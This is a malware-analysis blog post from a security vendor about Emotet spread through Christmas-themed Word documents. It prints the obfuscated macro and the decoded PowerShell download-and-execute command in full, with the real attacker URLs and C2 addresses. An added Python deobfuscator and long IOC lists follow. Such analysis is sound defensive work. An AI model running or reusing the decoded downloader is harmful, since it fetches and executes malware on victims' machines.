Submitted URL: https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html
Effective URL: https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc
Submission: On November 04 via api from US — Scanned from DE
THE CHRISTMAS CARD YOU NEVER WANTED - A NEW WAVE OF EMOTET IS BACK TO WREAK HAVOC

Suleyman Ozarslan, PhD | December 22, 2018

Cybercriminals take advantage of the holidays to improve their malware distribution rate. We have spotted samples with Christmas-themed filenames, such as ChristmasCard.doc, Christmas-Greeting-Card.doc, Christmas-wishes.doc, and Christmas-Congratulation.doc. When we analyzed the malicious documents we obtained, we saw that they download the infamous Emotet malware, a modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet thus continues to affect governments and the private and public sectors.

INITIAL ACCESS

The specific sample analyzed below is ChristmasCard.doc (SHA256: 1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC). When a victim opens the document, Microsoft Word asks whether to enable or disable macros, which reveals that a macro is embedded in the document. The document claims that it was created in an earlier version of Microsoft Office and asks the victim to enable the content, which launches the code hidden in the macro.

EXECUTION

The VBA (Visual Basic for Applications) code in the embedded macro is given below:

Function EiDJKjLt()
    On Error Resume Next
    kRZXpYi = Array(TXwzCHKXZ, WiFKpY, NTNqBN, Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15), nAwUAJnM)
    Select Case vhWrwwLHwhINhj
        Case 21458470
            vtPEXawqKYqTzo = 205771406
            bJOUowYROCUnaEvkFGjfFijV = Oct(fhaIrJIBLlXViMzUwpUGL + CStr(FcGOrIzszdsmIRwIX + Log(298339837) - lOTYOWtjKGpLOXPb / Hex(328677453)))
            MsgBox (bJOUowYROCUnaEvkFGjfFijV)
    End Select
End Function

The macro is obfuscated to evade security controls. The most interesting part of it is:

Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15)

In this malicious macro, the Interaction.Shell method runs the program named in TextBox1 (the second argument, 15 - 15, evaluates to 0, the hidden window style, so the program runs without a visible window). TextBox1 itself is hidden in the document, so the victim never sees its content.

We used the Debug.Print method to see the content of TextBox1 and obtained the following command, which the Interaction.Shell method executes:

c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"

This is heavily obfuscated to make detection difficult; the only readable part is c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe. Three random directory names are appended to c:\ to bypass weak security controls, and three \.. components then traverse back up to c:\. The resulting path is c:\windows\system32\cmd.exe, which runs the subsequent commands.
However, those commands are also obfuscated:

"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"

The second and third commands are interesting:

for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%

Briefly, this loop rebuilds the XhOY variable in reverse order, one character at a time from index 497 down to 0, and then calls the result. Let's look at the XhOY variable:

'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop

And the XhOY variable in reverse order:

powershell $KSv='DfV';$ohl=new-object Net.WebClient;$lIY='http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'.Split('@');$svv='mba';$iro = '150';$FBp='Wjn';$kjh=$env:temp+'\'+$iro+'.exe';foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);$jVi='ORc';If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;$bLW='iGG';break;}}catch{}}$HTB='tWJ'

Now we can see that it is a PowerShell command, obfuscated with variable substitution and garbage variable assignments. Even so, by removing the garbage variables and substituting the values of the remaining variables where they are used, we can reveal the following command:

powershell foreach($wFR in 'http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'.Split('@')){try{(new-object Net.WebClient).DownloadFile($wFR, $env:temp+'\'+'150'+'.exe');If ((Get-Item ($env:temp+'\'+'150'+'.exe')).length -ge 80000) {Invoke-Item ($env:temp+'\'+'150'+'.exe');break;}}catch{}}

Briefly, this command tries to download 150.exe from the following addresses, in the given order, via the Net.WebClient.DownloadFile method. If the download succeeds, it executes the downloaded file with the Invoke-Item cmdlet and exits the loop. It treats a download as successful when the file length is -ge 80000 (ge: greater than or equal to), so a short error page or an empty response is not executed.

http://www.ideenweberei.com/L9NXvhd
http://www.capbangkok.com/p1SolwJv
http://www.trinityriveroutfitters.com/W4CGsWIzI
http://www.hayashitoysmart.com/add_favorites/XJJSoydNv
http://cleeft.nl/60ILq1CgH

When we examined the 150.exe file (SHA256: 5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D), we realized that it is the infamous Emotet trojan. As expected from an Emotet sample, it tries to download a file from the following locations:

213.120.119.231:8443
78.189.21.131:80
187.140.90.91:8080
81.150.17.158:50000
1.150.17.158:8443
201.190.150.60:443

After a few failed attempts, it downloaded the archivesymbol.exe file (SHA256: 5DA7A92311FDA255EFAC52C6BFEBCED31BD584453F6BB4F8DE6CDD1B2505B00F) from 201.190.150.60:443 into the C:\Users\admin\AppData\Local\archivesymbol\ folder. Emotet artifacts usually mimic the names of known executables.
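The unpacking steps described above, written out as an added Python example (this is not code from the original post or from Picus): it collapses the ..\ traversal in the launcher path with ntpath.normpath, resolves the %ProgramData:~0,1%%ProgramData:~9,2% substrings against the default C:\ProgramData value (they spell out the name of the program that cmd.exe launches), rebuilds the string that the for /L loop reverses, applies the :~6 slice from the call, and finally removes the garbage literal assignments from the PowerShell while inlining the ones that are actually used. The command line it works on is a constructed sample in the same shape as the real one: the URLs are .invalid placeholders, the variable names are arbitrary, and the decoded string is given six junk leading characters so that the :~6 slice has something to skip.

```python
"""Undo the cmd.exe / PowerShell launcher obfuscation described in the post.

Added example, not the post's own code. It collapses the ..\\ traversal in the
launcher path, resolves cmd.exe %VAR:~start,len% substrings, reverses the string
rebuilt by the for /L loop, and strips the garbage PowerShell variable assignments.
"""
import ntpath
import re

# Constructed sample in the same shape as the command on the page. The download
# URLs are .invalid placeholders, not real infrastructure, and the decoded launcher
# starts with six junk characters so that 'call %VAR:~6%' has something to skip.
_DECODED = (
    "JUNK66powershell $KSv='DfV';$ohl=new-object Net.WebClient;"
    "$lIY='http://a.example.invalid/x@http://b.example.invalid/y'.Split('@');"
    "$iro = '150';$kjh=$env:temp+'\\'+$iro+'.exe';"
    "foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);$jVi='ORc';"
    "If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;break;}}catch{}}$HTB='tWJ';"
)
_REVERSED = _DECODED[::-1]
SAMPLE_CMDLINE = (
    r"c:\SzCT\SbuaB\RdPsp\..\..\..\windows\system32\cmd.exe /c "
    r"%ProgramData:~0,1%%ProgramData:~9,2% /V:/C"
    + '"set XhOY=' + _REVERSED
    + "&&for /L %V in (" + str(len(_REVERSED) - 1) + ",-1,0)"
    + "do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%\""
)

# set VAR=<text>&&for /L %I in (N,-1,0)do set ACC=!ACC!!VAR:~%I,1!&&if %I==0 call %ACC:~SKIP%
LOOP_RE = re.compile(
    r"set (?P<var>\w+)=(?P<value>.*?)&&for /L %(?P<idx>\w+) in \((?P<start>\d+),-1,0\)"
    r"do set (?P<acc>\w+)=!(?P=acc)!!(?P=var):~%(?P=idx),1!"
    r"&&if %(?P=idx)==0 call %(?P=acc):~(?P<skip>\d+)%",
    re.DOTALL,
)
ENV_SLICE_RE = re.compile(r"%(\w+):~(\d+),(\d+)%")
LITERAL_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")   # $name='literal';
URL_RE = re.compile(r"https?://[^\s'\"@)]+")


def expand_env_substrings(text, env):
    """Resolve cmd.exe %VAR:~start,len% substrings for the variables we know."""
    def repl(m):
        value = env.get(m.group(1))
        if value is None:
            return m.group(0)          # unknown variable: leave it untouched
        start, length = int(m.group(2)), int(m.group(3))
        return value[start:start + length]
    return ENV_SLICE_RE.sub(repl, text)


def undo_reversal_loop(cmdline):
    """Rebuild what the for /L loop produces and apply the call's :~SKIP slice."""
    m = LOOP_RE.search(cmdline)
    if m is None:
        raise ValueError("no reversed-string loop found in command line")
    value, start, skip = m.group("value"), int(m.group("start")), int(m.group("skip"))
    # The loop appends value[start], value[start-1], ..., value[0]; cmd.exe's :~N,1
    # yields nothing for an out-of-range index, which value[:start+1] reproduces.
    rebuilt = value[: start + 1][::-1]
    return rebuilt[skip:]


def simplify_powershell(script):
    """Drop single-use literal assignments; inline the literals that are referenced."""
    out = script
    for m in LITERAL_ASSIGN_RE.finditer(script):
        name, literal, statement = m.group(1), m.group(2), m.group(0)
        refs = re.findall(r"\$" + re.escape(name) + r"\b", script)
        out = out.replace(statement, "", 1)
        if len(refs) > 1:                 # used elsewhere: substitute its value
            out = re.sub(r"\$" + re.escape(name) + r"\b", lambda _: "'" + literal + "'", out)
    return out


def analyze_launcher(cmdline, env=None):
    """Run the whole unpacking chain on one command line and return the findings."""
    env = env if env is not None else {"ProgramData": r"C:\ProgramData"}  # default Windows value
    exe, rest = cmdline.split(" ", 1)
    rest = expand_env_substrings(rest, env)
    decoded = undo_reversal_loop(cmdline)
    size = re.search(r"-ge\s+(\d+)", decoded)
    return {
        "launcher_path": ntpath.normpath(exe),   # ..\..\.. collapsed to the real binary
        "inner_launcher": rest.split()[1],       # program name spelled from %ProgramData%
        "decoded": decoded,
        "simplified": simplify_powershell(decoded),
        "urls": URL_RE.findall(decoded),
        "min_size": int(size.group(1)) if size else None,
    }


if __name__ == "__main__":
    for key, value in analyze_launcher(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

On the sample, analyze_launcher reports c:\windows\system32\cmd.exe as the real launcher, CmD as the program the %ProgramData% pieces spell out, the two placeholder URLs, and the 80000-byte size check; the same regexes apply to the real command quoted above because they key on the loop structure rather than on the variable names.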
To become persistent on the victim system, archivesymbol.exe adds its full path to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key in the Registry.

CONCLUSION

In this wave of attacks, the Emotet trojan spreads through emails that lure victims into downloading a Christmas-themed Word document. The document contains a macro that executes a PowerShell script to download a malicious payload, and the commands in the macro are heavily obfuscated for defense evasion.

With the Email Threat Simulation (ETS) Module, Picus customers can test the blocking performance of their network and client security systems against any malicious email without waiting to be infected by malware such as Emotet. In addition, with the Picus Endpoint Simulation Module (ESM), you can challenge your endpoint security controls against a wide range of threats, from basic attacks to Advanced Persistent Threats (APTs), with up-to-date attack techniques mapped to MITRE's ATT&CK framework. In conclusion, you can continuously verify and improve your security measures by applying the practical, quick-to-apply, and immediate mitigation actions provided by Picus. If you want to know how your enterprise security devices block these attacks, contact us at demo@picussecurity.com. Within a few hours, we can report how your network security systems protect against Emotet and other current cyber attacks.

PROCESS GRAPH

MITRE'S ATT&CK TECHNIQUES OBSERVED

Initial Access: T1193 Spearphishing Attachment; T1192 Spearphishing Link
Execution: T1059 Command-Line Interface; T1086 PowerShell; T1035 Service Execution; T1106 Execution through API
Persistence: T1060 Registry Run Keys / Startup Folder; T1050 New Service; T1137 Office Application Startup
Defense Evasion: T1140 Deobfuscate/Decode Files or Information; T1112 Modify Registry; T1064 Scripting
Discovery: T1012 Query Registry; T1082 System Information Discovery; T1057 Process Discovery; T1010 Application Window Discovery
Command and Control: T1071 Standard Application Layer Protocol; T1065 Uncommonly Used Port

INDICATOR OF COMPROMISES (IOC)

DELIVERY DOCUMENTS
1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC
216C7C9300632A99D808AC6C2BA26A53402AC584504BB7EAC3CBE35B56994D93
2563D86BB358D86D06856A5BECDCAD5B6461D88FDD49E362691D5DFAE43C4625
3B0609646D8FFC097DFEEFF7FC70A52B38C4AE53D93DE6FB96A1B1119E51DB4F
3C18597017EF58FEE97F8B28879DABEEC6DAE7A968A56A891D07D1DC52DDC3AF
4030D19135210C191D7761A432B295314588519A0D3497BEA401F6488C7DE445
69caceab49fdcf349e2862d18ed39ed586d4e1a973f2ffda9904808871f6bce

hxxp://63.143.67.107:20/
hxxp://78.189.21.131/
hxxp://81.150.17.158:8443/
hxxp://187.140.90.91:8080/
hxxp://198.61.196.18:8080/
hxxp://201.190.150.60:443/
hxxp://210.2.86.72:8080/
hxxp://213.120.119.231:8443/
hxxp://bod-karonconsulting.com/ZhsjepZP/
hxxp://www.countdown2chaos.com/RteZ6CxTl3/
hxxp://fortifi.com/IQmS1zuNj
hxxp://www.ideenweberei.com/L9NXvhd/
hxxp://kliksys.com/yuZ6yAFq/
hxxp://limaxbatteries.com/yc8jyNd/
hxxp://strike3productions.com/fHXdHseo0/
hxxp://www.mtyfurnishing.com/uV0Z7WiM/
hxxp://www.omegaserbia.com/1rDAPTYEgE/
hxxp://www.wmdcustoms.com/SoYuALGOUR/

CONNECTED IPS
63.143.67.107
70.55.69.202
72.5.53.5
75.119.205.247
78.189.21.131
81.150.17.158
103.4.235.152
148.66.137.40
181.197.253.133
181.57.97.83
181.60.57.250
187.140.90.91
188.166.101.236
189.222.20.165
190.195.129.227
195.208.1.119
198.61.196.18
201.190.150.60
209.95.55.249
210.2.86.72
213.120.119.231
216.120.247.90